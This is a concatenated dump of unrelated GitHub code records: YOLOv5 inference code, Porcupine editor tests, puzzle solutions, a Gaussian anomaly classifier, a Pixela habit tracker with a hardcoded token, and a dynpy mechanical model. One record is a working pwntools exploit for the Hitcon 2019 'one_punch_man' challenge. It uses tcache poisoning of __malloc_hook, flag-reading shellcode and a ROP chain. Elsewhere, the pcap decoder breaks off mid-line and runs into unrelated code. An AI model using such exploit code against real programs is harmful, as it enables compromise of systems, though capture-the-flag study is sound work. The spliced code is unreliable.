[time_sync()]\n p = next(self.model.parameters()) # for device and type\n if isinstance(imgs, torch.Tensor): # torch\n with amp.autocast(enabled=p.device.type != 'cpu'):\n return self.model(imgs.to(p.device).type_as(p), augment, profile) # inference\n\n # Pre-process\n n, imgs = (len(imgs), imgs) if isinstance(imgs, list) else (1, [imgs]) # number of images, list of images\n shape0, shape1, files = [], [], [] # image and inference shapes, filenames\n for i, im in enumerate(imgs):\n f = f'image{i}' # filename\n if isinstance(im, (str, Path)): # filename or uri\n im, f = Image.open(requests.get(im, stream=True).raw if str(im).startswith('http') else im), im\n im = np.asarray(exif_transpose(im))\n elif isinstance(im, Image.Image): # PIL Image\n im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename', f) or f\n files.append(Path(f).with_suffix('.jpg').name)\n if im.shape[0] < 5: # image in CHW\n im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1)\n im = im[..., :3] if im.ndim == 3 else np.tile(im[..., None], 3) # enforce 3ch input\n s = im.shape[:2] # HWC\n shape0.append(s) # image shape\n g = (size / max(s)) # gain\n shape1.append([y * g for y in s])\n imgs[i] = im if im.data.contiguous else np.ascontiguousarray(im) # update\n shape1 = [make_divisible(x, int(self.stride.max())) for x in np.stack(shape1, 0).max(0)] # inference shape\n x = [letterbox(im, new_shape=shape1, auto=False)[0] for im in imgs] # pad\n x = np.stack(x, 0) if n > 1 else x[0][None] # stack\n x = np.ascontiguousarray(x.transpose((0, 3, 1, 2))) # BHWC to BCHW\n x = torch.from_numpy(x).to(p.device).type_as(p) / 255 # uint8 to fp16/32\n t.append(time_sync())\n\n with amp.autocast(enabled=p.device.type != 'cpu'):\n # Inference\n y = self.model(x, augment, profile)[0] # forward\n t.append(time_sync())\n\n # Post-process\n y = non_max_suppression(y, self.conf, iou_thres=self.iou, classes=self.classes,\n multi_label=self.multi_label, max_det=self.max_det) # NMS\n for i in range(n):\n scale_coords(shape1, y[i][:, :4], shape0[i])\n\n t.append(time_sync())\n return Detections(imgs, y, files, t, self.names, x.shape)\n\n\nclass Detections:\n # YOLOv5 detections class for inference results\n def __init__(self, imgs, pred, files, times=None, names=None, shape=None):\n super().__init__()\n d = pred[0].device # device\n gn = [torch.tensor([*(im.shape[i] for i in [1, 0, 1, 0]), 1, 1], device=d) for im in imgs] # normalizations\n self.imgs = imgs # list of images as numpy arrays\n self.pred = pred # list of tensors pred[0] = (xyxy, conf, cls)\n self.names = names # class names\n self.files = files # image filenames\n self.xyxy = pred # xyxy pixels\n self.xywh = [xyxy2xywh(x) for x in pred] # xywh pixels\n self.xyxyn = [x / g for x, g in zip(self.xyxy, gn)] # xyxy normalized\n self.xywhn = [x / g for x, g in zip(self.xywh, gn)] # xywh normalized\n self.n = len(self.pred) # number of images (batch size)\n self.t = tuple((times[i + 1] - times[i]) * 1000 / self.n for i in range(3)) # timestamps (ms)\n self.s = shape # inference BCHW shape\n\n def display(self, pprint=False, show=False, save=False, crop=False, render=False, save_dir=Path('')):\n crops = []\n for i, (im, pred) in enumerate(zip(self.imgs, self.pred)):\n s = f'image {i + 1}/{len(self.pred)}: {im.shape[0]}x{im.shape[1]} ' # string\n if pred.shape[0]:\n for c in pred[:, -1].unique():\n n = (pred[:, -1] == c).sum() # detections per class\n s += f\"{n} {self.names[int(c)]}{'s' * (n > 1)}, \" # add to string\n if show or save or render or crop:\n annotator = Annotator(im, example=str(self.names))\n for *box, conf, cls in reversed(pred): # xyxy, confidence, class\n label = f'{self.names[int(cls)]} {conf:.2f}'\n if crop:\n file = save_dir / 'crops' / self.names[int(cls)] / self.files[i] if save else None\n crops.append({'box': box, 'conf': conf, 'cls': cls, 'label': label,\n 'im': save_one_box(box, im, file=file, save=save)})\n else: # all others\n annotator.box_label(box, label, color=colors(cls))\n im = annotator.im\n else:\n s += '(no detections)'\n\n im = Image.fromarray(im.astype(np.uint8)) if isinstance(im, np.ndarray) else im # from np\n if pprint:\n LOGGER.info(s.rstrip(', '))\n if show:\n im.show(self.files[i]) # show\n if save:\n f = self.files[i]\n im.save(save_dir / f) # save\n if i == self.n - 1:\n LOGGER.info(f\"Saved {self.n} image{'s' * (self.n > 1)} to {colorstr('bold', save_dir)}\")\n if render:\n self.imgs[i] = np.asarray(im)\n if crop:\n if save:\n LOGGER.info(f'Saved results to {save_dir}\\n')\n return crops\n\n def print(self):\n self.display(pprint=True) # print results\n LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {tuple(self.s)}' %\n self.t)\n\n def show(self):\n self.display(show=True) # show results\n\n def save(self, save_dir='runs/detect/exp'):\n save_dir = increment_path(save_dir, exist_ok=save_dir != 'runs/detect/exp', mkdir=True) # increment save_dir\n self.display(save=True, save_dir=save_dir) # save results\n\n def crop(self, save=True, save_dir='runs/detect/exp'):\n save_dir = increment_path(save_dir, exist_ok=save_dir != 'runs/detect/exp', mkdir=True) if save else None\n return self.display(crop=True, save=save, save_dir=save_dir) # crop results\n\n def render(self):\n self.display(render=True) # render results\n return self.imgs\n\n def pandas(self):\n # return detections as pandas DataFrames, i.e. print(results.pandas().xyxy[0])\n new = copy(self) # return copy\n ca = 'xmin', 'ymin', 'xmax', 'ymax', 'confidence', 'class', 'name' # xyxy columns\n cb = 'xcenter', 'ycenter', 'width', 'height', 'confidence', 'class', 'name' # xywh columns\n for k, c in zip(['xyxy', 'xyxyn', 'xywh', 'xywhn'], [ca, ca, cb, cb]):\n a = [[x[:5] + [int(x[5]), self.names[int(x[5])]] for x in x.tolist()] for x in getattr(self, k)] # update\n setattr(new, k, [pd.DataFrame(x, columns=c) for x in a])\n return new\n\n def tolist(self):\n # return a list of Detections objects, i.e. 'for result in results.tolist():'\n x = [Detections([self.imgs[i]], [self.pred[i]], self.names, self.s) for i in range(self.n)]\n for d in x:\n for k in ['imgs', 'pred', 'xyxy', 'xyxyn', 'xywh', 'xywhn']:\n setattr(d, k, getattr(d, k)[0]) # pop out of list\n return x\n\n def __len__(self):\n return self.n\n\n\nclass Classify(nn.Module):\n # Classification head, i.e. x(b,c1,20,20) to x(b,c2)\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1): # ch_in, ch_out, kernel, stride, padding, groups\n super().__init__()\n self.aap = nn.AdaptiveAvgPool2d(1) # to x(b,c1,1,1)\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g) # to x(b,c2,1,1)\n self.flat = nn.Flatten()\n\n def forward(self, x):\n z = torch.cat([self.aap(y) for y in (x if isinstance(x, list) else [x])], 1) # cat if list\n return self.flat(self.conv(z)) # flatten to x(b,c2)\n","repo_name":"shihanghoney97/YOLO-SK","sub_path":"code/models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":83446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71417116249","text":"import os\nimport sys\n\nimport pytest\n\nfrom porcupine import actions, get_main_window, menubar, tabs\n\n\ndef test_virtual_events_calling_menu_callbacks():\n called = []\n menubar.get_menu(\"Foo\").add_command(label=\"Bar\", command=(lambda: called.append(\"bar\")))\n menubar.get_menu(\"Foo\").add_command(\n label=\"Baz\", command=(lambda: called.append(\"baz\")), state=\"disabled\"\n )\n menubar.update_keyboard_shortcuts()\n get_main_window().update()\n get_main_window().event_generate(\"<>\")\n get_main_window().event_generate(\"<>\")\n assert called == [\"bar\"]\n\n\ndef test_set_enabled_based_on_tab(tabmanager):\n tab1 = tabs.Tab(tabmanager)\n tab2 = tabs.Tab(tabmanager)\n\n menubar.get_menu(\"Foo\").add_command(label=\"Spam\")\n menubar.set_enabled_based_on_tab(\"Foo/Spam\", (lambda tab: tab is tab2))\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.add_tab(tab1)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.add_tab(tab2)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"normal\"\n\n tabmanager.select(tab1)\n tabmanager.update()\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n tabmanager.close_tab(tab1)\n tabmanager.close_tab(tab2)\n assert menubar.get_menu(\"Foo\").entrycget(\"end\", \"state\") == \"disabled\"\n\n\ndef test_item_doesnt_exist():\n with pytest.raises(LookupError, match=r\"^menu item 'Asdf/BlaBlaBla' not found$\"):\n menubar.set_enabled_based_on_tab(\"Asdf/BlaBlaBla\", (lambda tab: True))\n\n\ndef test_text_widget_binding_weirdness(filetab):\n # write text to text widget and select some of it\n filetab.textwidget.insert(\"1.0\", \"hello world\")\n filetab.textwidget.tag_add(\"sel\", \"1.4\", \"1.7\")\n\n called = 0\n\n def fake_can_be_closed():\n nonlocal called\n called += 1\n return False\n\n filetab.can_be_closed = fake_can_be_closed\n\n # pressing ctrl+w should leave the text as is (default bindings don't run)\n # and try to close the tab (except that we prevented it from closing)\n filetab.update()\n filetab.textwidget.event_generate(\"<>\")\n assert filetab.textwidget.get(\"1.0\", \"end - 1 char\") == \"hello world\"\n assert called == 1\n\n\n@pytest.mark.skipif(sys.platform != \"win32\", reason=\"checks if Windows-specific bug was fixed\")\n@pytest.mark.xfail(\n os.environ.get(\"GITHUB_ACTIONS\") != \"true\",\n reason=\"fails on some computers even though pressing Alt+F4 works\",\n)\ndef test_alt_f4_bug_with_filetab(filetab, mocker):\n mock_quit = mocker.patch(\"porcupine.menubar.quit\")\n filetab.textwidget.event_generate(\"\")\n mock_quit.assert_called_once_with()\n\n\n@pytest.mark.skipif(sys.platform != \"win32\", reason=\"checks if Windows-specific bug was fixed\")\n@pytest.mark.xfail(\n os.environ.get(\"GITHUB_ACTIONS\") != \"true\",\n reason=\"fails on some computers even though pressing Alt+F4 works\",\n)\ndef test_alt_f4_bug_without_filetab(mocker):\n mock_quit = mocker.patch(\"porcupine.menubar.quit\")\n get_main_window().event_generate(\"\")\n mock_quit.assert_called_once_with()\n\n\ndef test_add_filetab_action(filetab, tmp_path):\n def _callback(tab):\n filetab.save_as(tmp_path / \"asdf.md\")\n tab.update()\n\n # TODO: https://github.com/Akuli/porcupine/issues/1364\n assert filetab.settings.get(\"filetype_name\", object) == \"Python\"\n\n # create action\n action = actions.register_filetab_action(\n name=\"python\",\n description=\"test python action\",\n callback=_callback,\n availability_callback=actions.filetype_is(\"Python\"),\n )\n\n path = \"testy_test/python\"\n\n # check that no item exists at path\n menu_item = menubar._find_item(\n menubar.get_menu(menubar._split_parent(path)[0]), menubar._split_parent(path)[1]\n )\n assert menu_item is None\n\n # register action to path\n menubar.add_filetab_action(path=path, action=action)\n\n # check path item exists\n menu = menubar.get_menu(menubar._split_parent(path)[0])\n menu_item = menubar._find_item(menu, menubar._split_parent(path)[1])\n assert menu_item is not None\n\n # check path item available\n assert menu.entrycget(index=menu_item, option=\"state\") == \"normal\"\n\n # activate item\n action.callback(filetab)\n\n # verify something happened\n assert filetab.settings.get(\"filetype_name\", object) == \"Markdown\"\n\n # check unavailable (because Markdown != Python)\n assert menu.entrycget(index=menu_item, option=\"state\") == \"disabled\"\n","repo_name":"Akuli/porcupine","sub_path":"tests/test_menubar.py","file_name":"test_menubar.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"14803791592","text":"import struct\n\ndef decode_pcap_file(pcap_file):\n with open(pcap_file, \"rb\") as file:\n # Read and skip the pcap file header (24 bytes)\n file.read(24)\n\n packet_number = 1 # Initialize packet number\n\n while True:\n # Read the pcap packet header (16 bytes)\n header = file.read(16)\n if not header:\n break\n\n # Extract packet timestamp and length\n ts_sec, ts_usec, incl_len, orig_len = struct.unpack(\"=2:\n while True:\n same_doll= False\n for n in range(0,len(basket)-1):\n if basket[n]==basket[n+1]:\n del basket[n]\n del basket[n]\n answer+=2\n same_doll=True\n break\n if not same_doll:\n break\n return answer\n","repo_name":"Hongsoojeong/AlgorithmStudy","sub_path":"2019 카카오 개발자 겨울 인턴십/1. 크레인 인형뽑기 게임.py","file_name":"1. 크레인 인형뽑기 게임.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9631741954","text":"from pwn import *\ncontext.log_level='debug'\ncontext.terminal = ['tmux', 'splitw', '-h']\ncontext.arch='amd64'\ndef cmd(c):\n p.sendlineafter(\"> \",str(c))\ndef add(idx,size,c=\"A\"):\n cmd(1)\n p.sendlineafter(\": \",str(idx))\n p.sendafter(\": \",c.ljust(size,'\\0'))\ndef edit(idx,c):\n cmd(2) \n p.sendlineafter(\": \",str(idx))\n p.sendafter(\": \",c)\ndef show(idx):\n cmd(3)\n p.sendlineafter(\": \",str(idx))\ndef free(idx):\n cmd(4)\n p.sendlineafter(\": \",str(idx))\n\nlibc=ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\np=process(\"./pwn\")\n#p=remote(\"buuoj.cn\",25327)\nfor x in range(6):\n add(0,0x88)\n free(0)\nfor x in range(7):\n add(0,0x288,\"n132\")\n free(0)\nadd(0,0x288)\nadd(1,0x99)\nfree(0)\nshow(0)\np.readuntil(\"name: \")\nbase=u64(p.read(6)+'\\0\\0')-libc.sym['__malloc_hook']-0x70\nlibc.address=base\n\nadd(0,0x1f8)\nfree(0)\nfree(1)\nadd(0,0x288)\nadd(1,0x99)\nfree(0)\nadd(2,0x1f8)\nfree(2)\nshow(2)\np.readuntil(\"name: \")\nheap=u64(p.read(6)+'\\0\\0')-0x17b0\nadd(2,0x217)\nfree(2)\nedit(2,p64(libc.sym['__malloc_hook']))\nedit(0,'\\0'*0x1f8+p64(0x91)+p64(heap+0x19a0)+p64(heap+0x30-0x10))\nlog.warning(hex(heap))\nlog.warning(hex(base))\nadd(1,0x88)\ncmd(0xc388)\nsh=shellcraft.open(\"./flag\")\nsh+='''\nmov rdi,rax\nmov rsi,{}\nmov rdx,0x30\nxor rax,rax\nsyscall\nmov rdi,1\nmov rax,1\nsyscall\n'''.format(heap+0x800)\np.send(asm(sh))\ncmd(0xc388)\ngadget=0x000000000010e994+base#add rsp,0x58;ret;\nrdi=0x0000000000026542+base\ngdb.attach(p)\np.send(p64(gadget))\nret=0x000000000002535f+base\nrdi=0x0000000000026542+base\nrsi=0x0000000000026f9e+base\nrdx=0x000000000012bda6+base\nrax=0x0000000000047cf8+base\nsys=0x0000000000026bd4+base\nrcx=0x000000000010b31e+base\nrop=p64(ret)*3+p64(rdi)+p64(0xa)+p64(rsi)+p64(heap)+p64(rdx)+p64(0x3000)+p64(rcx)+p64(7)+p64(libc.sym['syscall'])+p64(heap+0x1e30)\nadd(0,0x200,rop)\np.interactive()\n","repo_name":"n132/Watermalon","sub_path":"Hitcon_2019/one_punch_man/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"33606571565","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the jumpingOnClouds function below.\ndef jumpingOnClouds(n,c):\n jumps = 0\n i = 2\n while i <= n-1:\n jumps+=1\n i = i+2 if c[i] == 0 else i+1\n if i == n:\n jumps+=1\n return jumps\n\n\nif __name__ == '__main__':\n fptr = open('jumpingonclouds.txt', 'w')\n\n n = int('7')\n\n c = list(map(int, '0 0 0 0 0 0 0'.rstrip().split()))\n\n result = jumpingOnClouds(n,c)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"poornapragnarao/hackerrank","sub_path":"jumpingclouds.py","file_name":"jumpingclouds.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36586082646","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n## @package multivariategaussian\n#\n# Multivariate gaussian AIS (Artificial Immune System) classifier.\n\nfrom oacs.classifier.univariategaussian import UnivariateGaussian\nimport numpy as np\nimport pandas as pd\nfrom numpy import pi, exp\n\n## MultivariateGaussian\n#\n# Multivariate gaussian AIS (Artificial Immune System) classifier class, this will return a set of parameters: a vector of means Mu, and a covariance matrix Sigma2\n# This AIS classifier can catch any correlation between any feature\nclass MultivariateGaussian(UnivariateGaussian):\n\n ## @var config\n # An instance of the ConfigParser object, already loaded\n\n ## Constructor\n # @param config An instance of the ConfigParser class\n def __init__(self, config=None, *args, **kwargs):\n return UnivariateGaussian.__init__(self, config, *args, **kwargs)\n\n ## Learn the parameters from a given set X of examples, and labels Y\n # @param X Samples set\n # @param Y Labels set (corresponding to X)\n def learn(self, X=None, Y=None, *args, **kwargs):\n Yt = Y[Y==0].dropna() # get the list of non-anomalous examples\n Xt = X.iloc[Yt.index] # filter out anomalous examples and keep only non-anomalous ones\n Mu = self.mean(Xt, Xt['framerepeat']) # Mean\n Sigma2 = MultivariateGaussian.covar(Xt, Mu, 'framerepeat') # Vector of variances or Covariance matrix\n return {'Mu': Mu, 'Sigma2': Sigma2} # always return a dict of variables if you want your variables saved durably and accessible later\n\n ## Multivariate gaussian prediction of the probability/class of an example given a set of parameters (weighted mean and covariance matrix)\n # @param X One unknown example to label\n # @param Mu Weighted mean of X\n # @param Sigma2 Covariance matrix of X\n # TODO: compatibility with more than one sample (detect type==pdSseries)?\n def predict(self, X=None, Mu=None, Sigma2=None, *args, **kwargs):\n return MultivariateGaussian._predict(X=X, Mu=Mu, Sigma2=Sigma2)\n\n ## Multivariate gaussian prediction of the probability/class of an example given a set of parameters (weighted mean and covariance matrix)\n # Note: we use a proxy method predict so that we can put this one as a staticmethod, and thus be called by other classes (since the code here is very generic)\n # @param X One unknown example to label\n # @param Mu Weighted mean of X\n # @param Sigma2 Covariance matrix of X\n # TODO: compatibility with more than one sample (detect type==pdSseries)?\n @staticmethod\n def _predict(X=None, Mu=None, Sigma2=None, *args, **kwargs):\n if 'framerepeat' in X.keys():\n if type(X) == pd.Series:\n X = X.drop(['framerepeat']) # axis will produce a bug with Series\n else:\n X = X.drop(['framerepeat'], axis=1)\n if 'framerepeat' in Sigma2.keys():\n Sigma2 = Sigma2.drop(['framerepeat'], axis=0) # drop in both axis\n Sigma2 = Sigma2.drop(['framerepeat'], axis=1)\n if 'framerepeat' in Mu.keys():\n Mu = Mu.drop(['framerepeat'])\n\n # if sigma2 is a vector, we convert it to a (covariance) matrix (filled with only values on the diagonal)\n if type(Sigma2) == pd.Series:\n Sigma2 = np.diag(Sigma2)\n Sigma2 = pd.DataFrame(Sigma2)\n\n n = len(Mu.keys()) #X.shape[0]\n xm = X-Mu # X difference to the mean\n xm = xm.fillna(0) # if we have one NA, the whole result of all values will be NA\n if type(X) == pd.Series:\n Pred = (2*pi)**(-n/2) * np.linalg.det(Sigma2)**0.5 * exp(-0.5 * xm.T.dot(np.linalg.pinv(Sigma2)).dot(xm))\n else:\n #T = np.outer(xm.dot(np.linalg.pinv(Sigma2)), xm.T) #debug - produce Memory Error even with relatively small sets!\n #print T.shape #debug\n #print xm.shape #debug\n #print(T.head())\n Pred = (2*pi)**(-n/2) * np.linalg.det(Sigma2)**0.5 * exp(-0.5 * (xm.dot(np.linalg.pinv(Sigma2)) * xm).sum(axis=1)) # TODO: fix this, it does not work with more than one sample to test at a time\n\n return {'Prediction': Pred} # return the class of the sample(s)\n\n ## Compute the weighted mean of the dataset\n # @param X Samples dataset\n # @param weights Vector/Series of weights (ie: number of times one sample has to be repeated) - default: X['framerepeat']\n def mean(self, X, weights=None):\n return UnivariateGaussian.mean(X, weights)\n\n ## Compute the unbiased weighted sample covariance matrix of the dataset\n # Alternative to pandas.DataFrame.cov(), because pandas's and numpy's cov() can't account for weights (if you set mean = X.mean() and weights = None, then you'll get the exact same result as X.cov())\n # Note: this works ONLY with unnormalized, integer weights >= 0 representing the number of occurrences of an observation (number of \"repeat\" of one row in the sample)\n # LaTeX equation: \\Sigma=\\frac{1}{\\sum_{i=1}^{N}w_i - 1}\\sum_{i=1}^N w_i \\left(x_i - \\mu^*\\right)^2\n # @param X One example or a dataset of examples (must the same columns/keys as mean)\n # @param mean Weighted mean (must have the same columns/keys as X, else you will get a weird result, because pandas will still try to adapt and things will get really messed up!)\n # @param weights Name of the weights column to remove from the final result (else it may flaw the computation of the prediction)\n # TODO: bigdata iteration version (detect generator?) - WARNING: then the division by m-1 must be done at the end of all the sums of all sigma2 of every x sample!\n @staticmethod\n def covar(X, mean, weights=None):\n if weights is None: weights = 'framerepeat'\n w = None\n if weights in X.keys(): w = X[weights] # backing up the keys\n if weights in X.keys() and weights not in mean.keys():\n if type(X) == pd.Series:\n ax = 0\n else:\n ax = 1\n X = X.drop(weights, axis=ax)\n xm = X-mean # xm = X diff to mean\n xm = xm.fillna(0) # fill nan with 0 because anyway 0 will give a 0 covariance's coordinate (which means in practical that it is null), but the computation of other covariance's coordinates will be OK (while if you have NaNs you would end up with a covariance matrix filled with NaNs)\n # BigData alternative: compute the covariance one sample at a time (one row with several columns representing different variables)\n #if type(X) == pd.Series:\n # sigma2 = np.outer(xm.T, xm); # force matrix multiplication outer product (else if you use np.dot() or pandas.dot(), it will align by the indexes and make the dot product)\n #else:\n\n # If there are weights, compute the unbiased weighted sample covariance\n if w is not None:\n sigma2 = 1./(w.sum()-1) * xm.mul(w, axis=0).T.dot(xm);\n # Else we compute the unbiased sample covariance (without weights)\n else:\n m = X.shape[0]\n sigma2 = 1./(m-1) * xm.T.dot(xm); # Sigma2 = 1/m * X' * X\n\n return sigma2\n","repo_name":"lrq3000/oacs","sub_path":"oacs/classifier/multivariategaussian.py","file_name":"multivariategaussian.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"23324681320","text":"from datetime import datetime\nimport os\n\nimport requests\n\nUSERNAME = 'ishkining'\nTOKEN = 'idontknowwhyilovetoeat'\nGRAPH_ID = 'graphtest1'\n\npixela_endpoint = 'https://pixe.la/v1/users'\n\nuser_params = {\n 'token': TOKEN,\n 'username': USERNAME,\n 'agreeTermsOfService': 'yes',\n 'notMinor': 'yes',\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\ngraph_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs'\n\ngraph_config = {\n 'id': GRAPH_ID,\n 'name': 'Test',\n 'unit': 'minutes',\n 'type': 'int',\n 'color': 'ajisai',\n}\n\nheaders = {\n 'X-USER-TOKEN': TOKEN\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\npixel_creation_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}'\n\npixel_data = {\n 'date': datetime.now().strftime('%Y%m%d'),\n 'quantity': '10',\n}\n\n# response = requests.post(url=pixel_creation_endpoint, json=pixel_data, headers=headers)\n# print(response.text)\n\nupdate_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/' \\\n f'{datetime(year=2022, month=7, day=26).strftime(\"%Y%m%d\")}'\n\nnew_pixel_data = {\n 'quantity': '5'\n}\n\n# response = requests.put(url=update_endpoint, json=new_pixel_data, headers=headers)\n# print(response.text)\n\npixel_delete_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}'\n\n# response = requests.delete(url=pixel_delete_endpoint, headers=headers)\n# print(response.text)","repo_name":"ishkining/100_days_of_python","sub_path":"days 31-40/day 37/habit_tracker.py","file_name":"habit_tracker.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15918689077","text":"from sympy import (Symbol, symbols, Matrix, sin, cos, asin, diff, sqrt, S,\n diag, Eq, hessian, Function, flatten, Tuple, im, pi, latex,\n dsolve, solve, fraction, factorial, Subs, Number, oo, Abs,\n N, solveset)\n\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point\nfrom sympy.physics.vector import vpprint, vlatex\nfrom ...dynamics import LagrangesDynamicSystem, HarmonicOscillator, mech_comp\n\nfrom ..elements import MaterialPoint, Spring, GravitationalForce, Disk, RigidBody2D, Damper, PID, Excitation, Force, base_frame, base_origin\nfrom dynpy import * # enables mechanical models for mathematical modelling\n\n\nfrom sympy import * # provides mathematical interface for symbolic calculations\n\n\nfrom sympy.physics.mechanics import *\n\nimport sympy as sym\nimport numpy as np\nimport numpy.fft as fft\n\nimport matplotlib.pyplot as plt\nimport math\n\nfrom dynpy.utilities.report import SystemDynamicsAnalyzer\n\nimport pandas as pd\n\nfrom dynpy.utilities.adaptable import *\n\n\nfrom pint import UnitRegistry\nureg = UnitRegistry()\n\nix = pd.IndexSlice\n\n\n\nt,f= symbols('t, f')\n\n\nfrom .principles import ComposedSystem, NonlinearComposedSystem, base_frame, base_origin, REPORT_COMPONENTS_LIST\n#TODO? 156\nclass DampedChair4DOF(ComposedSystem):\n\n scheme_name = 'chair5dof.jpg'\n real_name = 'gtm.png'\n \n z,phi,z_fr,z_rear,x=dynamicsymbols('z varphi z_f z_r x')\n M=Symbol('M', positive=True)\n m=Symbol('m', positive=True)\n m_b=Symbol('m_b', positive=True)\n m_k=Symbol('m_k', positive=True)\n m_fr=Symbol('m_fw', positive=True)\n m_rear=Symbol('m_rw', positive=True)\n I_ch=Symbol('I_ch', positive=True)\n I_w=Symbol('I_rw', positive=True)\n l_rod=Symbol('l_{rod}', positive=True)\n l_l=Symbol('l_l', positive=True)\n l_k=Symbol('l_k', positive=True)\n l_r=Symbol('l_r', positive=True)\n l_rear=Symbol('l_r', positive=True)\n l_bumps=Symbol('l_bumps', positive=True)\n l_fr=Symbol('l_fr', positive=True)\n l_b=Symbol('l_b', positive=True)\n k_r=Symbol('k_r', positive=True)\n k_rt=Symbol('k_rt', positive=True)\n k_f=Symbol('k_f', positive=True)\n k_ft=Symbol('k_ft', positive=True)\n c_rs=Symbol('c_rs', positive=True)\n c_fs=Symbol('c_fs', positive=True)\n c_rt=Symbol('c_rt', positive=True)\n c_ft=Symbol('c_ft', positive=True)\n c=Symbol('c', positive=True)\n F_engine=Symbol('F_{engine}', positive=True)\n k_p=Symbol('k_p', positive=True)\n k_l=Symbol('k_l', positive=True)\n F=Symbol('F_0', positive=True)\n A=Symbol('A', positive=True)\n omega=Symbol('omega', positive=True)\n Omega=Symbol('Omega', positive=True)\n z_l=Symbol('z_l', positive=True)\n z_p=Symbol('z_p',positive=True)\n z_b=Symbol('z_b',positive=True)\n s=Symbol('s', positive=True)\n ivar=Symbol('t')\n f=Symbol('f', positive=True)\n k=Symbol('k', positive=True)\n g=Symbol('g', positive=True)\n R=Symbol('R_rw', positive=True)\n amplitude=Symbol('amplitude',positive=True)\n length=Symbol('length',positive=True)\n speed=Symbol('speed',positive=True)\n Leng=Symbol('Leng',positive=True)\n k_rot=Symbol('k_rot',positive=True)\n F_1=Symbol('F_1',positive=True)\n F_2=Symbol('F_2',positive=True)\n v0=Symbol('v_0',positive=True)\n u0=Symbol('u_0',positive=True)\n z_c3=Symbol('z_c3',positive=True)\n xm_3=Symbol('xm_3',positive=True)\n t_l=Symbol('t_l',positive=True)\n delta_t=Symbol('delta_t',positive=True)\n l_ramp=Symbol('l_ramp',positive=True)\n axw=Symbol('axw',positive=True)\n pm=Symbol('PM',positive=True)\n M_m=Symbol('M_m',positive=True)\n K_m=Symbol('K_m',positive=True)\n C_m=Symbol('C_m',positive=True)\n T=Symbol('T')\n V=Symbol('V')\n D=Symbol('D')\n# xt=dynamicsymbols('qwe') #dummy variable for deleting t symbol from descriptions\n def __init__(self,\n m=None,\n M=None,\n m_k=None,\n m_fr=None,\n m_rear=None,\n m_b=None,\n I_ch=None,\n I_w=None,\n l_rod=None,\n l_l=None,\n l_r=None,\n l_fr=None,\n l_b=None,\n l_k=None,\n k_r=None,\n k_rt=None,\n k_f=None,\n k_ft=None,\n c_l=None,\n c_p=None,\n c_rt=None,\n c_ft=None,\n c=None,\n f=None,\n g=None,\n F_engine=None,\n ivar=Symbol('t'),\n z=None,\n x=None,\n s=None,\n phi=None,\n z_fr=None,\n z_rear=None,\n F=None,\n A=None,\n R=None,\n Omega=None,\n omega=None,\n z_l=None,\n z_p=None,\n z_b=None,\n l_bumps=None,\n amplitude=None,\n length=None,\n speed=None,\n Leng=None,\n k=None,\n k_rot=None,\n F_1=None,\n F_2=None,\n v0=None,\n u0=None,\n z_c3=None,\n xm_3=None,\n t_l=None,\n delta_t=None,\n l_ramp=None,\n axw=None,\n pm=None,\n# xt=None,\n **kwargs):\n \n if z is not None: self.z=z\n if x is not None: self.x=x\n if z_rear is not None: self.z_rear=z_rear\n if z_fr is not None: self.z_pw=z_pw\n if z_l is not None: self.z_lw=z_lw\n if z_p is not None: self.z_pw=z_pw\n if z_b is not None: self.z_b=z_b\n if phi is not None: self.phi=phi\n\n if M is not None: self.M = M # mass of a rod\n if m is not None: self.m = m\n if m_fr is not None: self.m_fr = m_fr\n if m_rear is not None: self.m_rear = m_rear\n if m_b is not None: self.m_b = m_b\n if m_k is not None: self.m_k = m_k\n if l_l is not None: self.l_l = l_l # offset of left spring\n if l_fr is not None: self.l_fr = l_fr\n if l_r is not None: self.l_r = l_r #offset of right spring\n if l_b is not None: self.l_b = l_b \n if l_k is not None: self.l_k = l_k \n if l_rod is not None: self.l_rod = l_rod\n if k_r is not None: self.k_r = k_r\n if k_rt is not None: self.k_rt = k_rt\n if k_f is not None: self.k_f = k_f\n if k_ft is not None: self.k_ft = k_ft\n if c_l is not None: self.c_l=c_l\n if c_p is not None: self.c_p=c_p\n if c_rt is not None: 